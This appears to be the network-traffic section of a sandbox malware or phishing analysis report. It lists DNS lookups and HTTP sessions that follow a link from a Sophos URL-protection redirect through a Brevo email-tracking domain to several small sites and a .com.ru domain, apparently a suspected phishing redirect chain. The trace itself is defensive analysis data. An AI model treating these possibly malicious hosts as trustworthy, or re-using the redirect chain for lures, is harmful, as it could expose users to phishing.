                                                Aug 20, 2024 15:40:47.842386007 CEST53599181.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:47.889206886 CEST5066153192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:47.889554977 CEST6455853192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:47.910376072 CEST53645581.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:47.916881084 CEST53539531.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:48.334373951 CEST53506611.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:49.215564966 CEST53491971.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:49.975179911 CEST6335853192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:49.975311995 CEST5174453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:49.990643978 CEST53517441.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:49.994307995 CEST53633581.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:51.121972084 CEST5203653192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:51.122123957 CEST5301053192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:51.129725933 CEST53520361.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:51.130877972 CEST53530101.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.170681000 CEST5755753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.170911074 CEST6148153192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.177915096 CEST53575571.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.179045916 CEST53614811.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.180200100 CEST6352253192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.180372953 CEST6359253192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.216775894 CEST53635921.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.420955896 CEST53635221.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.670567036 CEST5807853192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.670712948 CEST5771953192.168.2.161.1.1.1
                                                Aug 20, 2024 15:40:52.677412987 CEST53580781.1.1.1192.168.2.16
                                                Aug 20, 2024 15:40:52.677865982 CEST53577191.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:06.145148993 CEST53580411.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:25.111552000 CEST53626611.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:47.740674019 CEST53506341.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:47.863135099 CEST53567301.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:52.375914097 CEST4958453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:52.376177073 CEST5820253192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:52.389967918 CEST53582021.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:52.505347967 CEST53495841.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:52.716543913 CEST138138192.168.2.16192.168.2.255
                                                Aug 20, 2024 15:41:55.860780954 CEST5643453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:55.861088991 CEST5661453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:55.895572901 CEST53566141.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:56.197187901 CEST53564341.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:56.877477884 CEST6458753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:56.877614975 CEST5138253192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:56.877907038 CEST6506453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:56.878037930 CEST5144553192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:56.884841919 CEST53650641.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:56.885298014 CEST53513821.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:56.886198044 CEST53645871.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:56.886405945 CEST53514451.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:57.663055897 CEST5117753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:57.663217068 CEST5044153192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:57.670509100 CEST53511771.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:57.671227932 CEST53504411.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:58.305825949 CEST5745753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:58.305982113 CEST5755153192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:58.313431025 CEST53574571.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:58.313898087 CEST53575511.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:58.318583012 CEST6447853192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:58.318736076 CEST5081253192.168.2.161.1.1.1
                                                Aug 20, 2024 15:41:58.325505018 CEST53644781.1.1.1192.168.2.16
                                                Aug 20, 2024 15:41:58.325639963 CEST53508121.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:08.567042112 CEST5534053192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:08.567320108 CEST5179353192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:08.747046947 CEST53517931.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:08.831924915 CEST53553401.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:13.100646973 CEST6223753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:13.100872993 CEST5839053192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:13.203397989 CEST53622371.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:13.281368017 CEST4961753192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:13.281568050 CEST5339953192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:13.290131092 CEST53496171.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:13.290389061 CEST53533991.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:13.308475971 CEST53583901.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:14.044553041 CEST5020153192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:14.044687033 CEST6443453192.168.2.161.1.1.1
                                                Aug 20, 2024 15:42:14.052201033 CEST53502011.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:14.052697897 CEST53644341.1.1.1192.168.2.16
                                                Aug 20, 2024 15:42:15.510258913 CEST53567001.1.1.1192.168.2.16
                                                TimestampSource IPDest IPChecksumCodeType
                                                Aug 20, 2024 15:42:13.308670998 CEST192.168.2.161.1.1.1c286(Port unreachable)Destination Unreachable
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 20, 2024 15:40:47.889206886 CEST192.168.2.161.1.1.10xad49Standard query (0)us-west-2.protection.sophos.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:47.889554977 CEST192.168.2.161.1.1.10x4e7aStandard query (0)us-west-2.protection.sophos.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:49.975179911 CEST192.168.2.161.1.1.10xa06cStandard query (0)e9dj7.r.ag.d.sendibm3.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.975311995 CEST192.168.2.161.1.1.10x3160Standard query (0)e9dj7.r.ag.d.sendibm3.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:51.121972084 CEST192.168.2.161.1.1.10x896Standard query (0)sibautomation.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:51.122123957 CEST192.168.2.161.1.1.10x4ca5Standard query (0)sibautomation.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:52.170681000 CEST192.168.2.161.1.1.10x7b30Standard query (0)in-automate.brevo.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.170911074 CEST192.168.2.161.1.1.10x1c97Standard query (0)in-automate.brevo.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:52.180200100 CEST192.168.2.161.1.1.10x6092Standard query (0)willpeltz.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.180372953 CEST192.168.2.161.1.1.10xa13bStandard query (0)willpeltz.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:52.670567036 CEST192.168.2.161.1.1.10x47bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.670712948 CEST192.168.2.161.1.1.10x5cStandard query (0)www.google.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:52.375914097 CEST192.168.2.161.1.1.10x5394Standard query (0)career4vets.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:52.376177073 CEST192.168.2.161.1.1.10x5e62Standard query (0)career4vets.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:55.860780954 CEST192.168.2.161.1.1.10xac3cStandard query (0)riseandgain.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:55.861088991 CEST192.168.2.161.1.1.10x22f9Standard query (0)riseandgain.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:56.877477884 CEST192.168.2.161.1.1.10x56e6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.877614975 CEST192.168.2.161.1.1.10x594fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:56.877907038 CEST192.168.2.161.1.1.10xcfafStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.878037930 CEST192.168.2.161.1.1.10x2dc5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:57.663055897 CEST192.168.2.161.1.1.10x3d0dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:57.663217068 CEST192.168.2.161.1.1.10x1f15Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:58.305825949 CEST192.168.2.161.1.1.10x1e4bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.305982113 CEST192.168.2.161.1.1.10x10f2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:58.318583012 CEST192.168.2.161.1.1.10xc358Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.318736076 CEST192.168.2.161.1.1.10xe5c0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:42:08.567042112 CEST192.168.2.161.1.1.10x9d61Standard query (0)bestcomps.com.ruA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:08.567320108 CEST192.168.2.161.1.1.10xf885Standard query (0)bestcomps.com.ru65IN (0x0001)false
                                                Aug 20, 2024 15:42:13.100646973 CEST192.168.2.161.1.1.10xb1f2Standard query (0)bestcomps.com.ruA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.100872993 CEST192.168.2.161.1.1.10x80e7Standard query (0)bestcomps.com.ru65IN (0x0001)false
                                                Aug 20, 2024 15:42:13.281368017 CEST192.168.2.161.1.1.10x4f3bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.281568050 CEST192.168.2.161.1.1.10x743eStandard query (0)code.jquery.com65IN (0x0001)false
                                                Aug 20, 2024 15:42:14.044553041 CEST192.168.2.161.1.1.10x6462Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:14.044687033 CEST192.168.2.161.1.1.10x2bc6Standard query (0)code.jquery.com65IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 20, 2024 15:40:47.910376072 CEST1.1.1.1192.168.2.160x4e7aNo error (0)us-west-2.protection.sophos.comd2t07dpvw9bt1v.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                Aug 20, 2024 15:40:48.334373951 CEST1.1.1.1192.168.2.160xad49No error (0)us-west-2.protection.sophos.comd2t07dpvw9bt1v.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                Aug 20, 2024 15:40:48.334373951 CEST1.1.1.1192.168.2.160xad49No error (0)d2t07dpvw9bt1v.cloudfront.net3.165.113.82A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:48.334373951 CEST1.1.1.1192.168.2.160xad49No error (0)d2t07dpvw9bt1v.cloudfront.net3.165.113.51A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:48.334373951 CEST1.1.1.1192.168.2.160xad49No error (0)d2t07dpvw9bt1v.cloudfront.net3.165.113.4A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:48.334373951 CEST1.1.1.1192.168.2.160xad49No error (0)d2t07dpvw9bt1v.cloudfront.net3.165.113.88A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.990643978 CEST1.1.1.1192.168.2.160x3160No error (0)e9dj7.r.ag.d.sendibm3.comr.mailin.frCNAME (Canonical name)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.994307995 CEST1.1.1.1192.168.2.160xa06cNo error (0)e9dj7.r.ag.d.sendibm3.comr.mailin.frCNAME (Canonical name)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.994307995 CEST1.1.1.1192.168.2.160xa06cNo error (0)r.mailin.frr1.mailin.frCNAME (Canonical name)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.994307995 CEST1.1.1.1192.168.2.160xa06cNo error (0)r1.mailin.fr1.179.112.195A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.994307995 CEST1.1.1.1192.168.2.160xa06cNo error (0)r1.mailin.fr1.179.112.197A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:49.994307995 CEST1.1.1.1192.168.2.160xa06cNo error (0)r1.mailin.fr1.179.112.196A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:51.129725933 CEST1.1.1.1192.168.2.160x896No error (0)sibautomation.com104.18.25.243A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:51.129725933 CEST1.1.1.1192.168.2.160x896No error (0)sibautomation.com104.18.24.243A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:51.130877972 CEST1.1.1.1192.168.2.160x4ca5No error (0)sibautomation.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:52.177915096 CEST1.1.1.1192.168.2.160x7b30No error (0)in-automate.brevo.com104.18.7.69A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.177915096 CEST1.1.1.1192.168.2.160x7b30No error (0)in-automate.brevo.com104.18.6.69A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.179045916 CEST1.1.1.1192.168.2.160x1c97No error (0)in-automate.brevo.com65IN (0x0001)false
                                                Aug 20, 2024 15:40:52.420955896 CEST1.1.1.1192.168.2.160x6092No error (0)willpeltz.com162.241.114.35A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.677412987 CEST1.1.1.1192.168.2.160x47bNo error (0)www.google.com216.58.212.164A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:40:52.677865982 CEST1.1.1.1192.168.2.160x5cNo error (0)www.google.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:52.505347967 CEST1.1.1.1192.168.2.160x5394No error (0)career4vets.com162.241.87.113A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.197187901 CEST1.1.1.1192.168.2.160xac3cNo error (0)riseandgain.com162.241.87.113A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.884841919 CEST1.1.1.1192.168.2.160xcfafNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.884841919 CEST1.1.1.1192.168.2.160xcfafNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.885298014 CEST1.1.1.1192.168.2.160x594fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:56.886198044 CEST1.1.1.1192.168.2.160x56e6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.886198044 CEST1.1.1.1192.168.2.160x56e6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:56.886405945 CEST1.1.1.1192.168.2.160x2dc5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:57.670509100 CEST1.1.1.1192.168.2.160x3d0dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:57.670509100 CEST1.1.1.1192.168.2.160x3d0dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:57.671227932 CEST1.1.1.1192.168.2.160x1f15No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:58.313431025 CEST1.1.1.1192.168.2.160x1e4bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.313431025 CEST1.1.1.1192.168.2.160x1e4bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.313898087 CEST1.1.1.1192.168.2.160x10f2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:41:58.325505018 CEST1.1.1.1192.168.2.160xc358No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.325505018 CEST1.1.1.1192.168.2.160xc358No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:41:58.325639963 CEST1.1.1.1192.168.2.160xe5c0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                Aug 20, 2024 15:42:08.747046947 CEST1.1.1.1192.168.2.160xf885No error (0)bestcomps.com.ru65IN (0x0001)false
                                                Aug 20, 2024 15:42:08.831924915 CEST1.1.1.1192.168.2.160x9d61No error (0)bestcomps.com.ru188.114.97.3A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:08.831924915 CEST1.1.1.1192.168.2.160x9d61No error (0)bestcomps.com.ru188.114.96.3A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.203397989 CEST1.1.1.1192.168.2.160xb1f2No error (0)bestcomps.com.ru188.114.96.3A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.203397989 CEST1.1.1.1192.168.2.160xb1f2No error (0)bestcomps.com.ru188.114.97.3A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.290131092 CEST1.1.1.1192.168.2.160x4f3bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.290131092 CEST1.1.1.1192.168.2.160x4f3bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.290131092 CEST1.1.1.1192.168.2.160x4f3bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.290131092 CEST1.1.1.1192.168.2.160x4f3bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:13.308475971 CEST1.1.1.1192.168.2.160x80e7No error (0)bestcomps.com.ru65IN (0x0001)false
                                                Aug 20, 2024 15:42:14.052201033 CEST1.1.1.1192.168.2.160x6462No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:14.052201033 CEST1.1.1.1192.168.2.160x6462No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:14.052201033 CEST1.1.1.1192.168.2.160x6462No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                Aug 20, 2024 15:42:14.052201033 CEST1.1.1.1192.168.2.160x6462No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                • login.live.com
                                                • us-west-2.protection.sophos.com
                                                • e9dj7.r.ag.d.sendibm3.com
                                                • https:
                                                  • sibautomation.com
                                                  • in-automate.brevo.com
                                                  • willpeltz.com
                                                  • career4vets.com
                                                  • riseandgain.com
                                                  • cdnjs.cloudflare.com
                                                  • challenges.cloudflare.com
                                                  • bestcomps.com.ru
                                                  • code.jquery.com
                                                • fs.microsoft.com
                                                • slscr.update.microsoft.com
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.164970440.126.32.76443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:42 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                Connection: Keep-Alive
                                                Content-Type: application/soap+xml
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                Content-Length: 4775
                                                Host: login.live.com
                                                2024-08-20 13:40:42 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                2024-08-20 13:40:42 UTC569INHTTP/1.1 200 OK
                                                Cache-Control: no-store, no-cache
                                                Pragma: no-cache
                                                Content-Type: application/soap+xml; charset=utf-8
                                                Expires: Tue, 20 Aug 2024 13:39:42 GMT
                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                Referrer-Policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C538_BL2
                                                x-ms-request-id: 928046cb-fd94-4fe0-b0c7-5c7f2f801c9f
                                                PPServer: PPV: 30 H: BL02EPF0001D77F V: 0
                                                X-Content-Type-Options: nosniff
                                                Strict-Transport-Security: max-age=31536000
                                                X-XSS-Protection: 1; mode=block
                                                Date: Tue, 20 Aug 2024 13:40:42 GMT
                                                Connection: close
                                                Content-Length: 11369
                                                2024-08-20 13:40:42 UTC11369INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.16497093.165.113.824435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:49 UTC1091OUTGET /?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg HTTP/1.1
                                                Host: us-west-2.protection.sophos.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:49 UTC678INHTTP/1.1 302 Found
                                                Content-Type: text/html
                                                Content-Length: 0
                                                Connection: close
                                                Date: Tue, 20 Aug 2024 13:40:49 GMT
                                                X-Amzn-Trace-Id: Root=1-66c49ce1-4783a29115f6ca397236058a;Parent=6c09aec05798356e;Sampled=0;lineage=b506645d:0
                                                x-amzn-RequestId: cc347263-2766-4fd9-98cd-ce865a11aaf8
                                                Referrer-Policy: no-referrer
                                                X-Robots-Tag: noindex, nofollow
                                                x-amz-apigw-id: cz1zTHHHvHcEtJQ=
                                                Location: https://e9dj7.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkf
                                                X-Cache: Miss from cloudfront
                                                Via: 1.1 c420c087f7cab31cec047685621eab8e.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: CDG50-P3
                                                X-Amz-Cf-Id: pgN2YCJzHTMIj2PjvUtGhV6thy9PGFuEHvYQyMS03DEJj8njbj8AWA==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.16497101.179.112.1954435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:50 UTC716OUTGET /mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkf HTTP/1.1
                                                Host: e9dj7.r.ag.d.sendibm3.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:51 UTC241INHTTP/1.1 200 OK
                                                Content-Length: 581
                                                Content-Type: text/html; charset=utf-8
                                                Date: Tue, 20 Aug 2024 13:40:50 GMT
                                                X-Content-Type-Options: nosniff
                                                X-Sib-Server: gke-public-cluster-v2-1-179-112-136
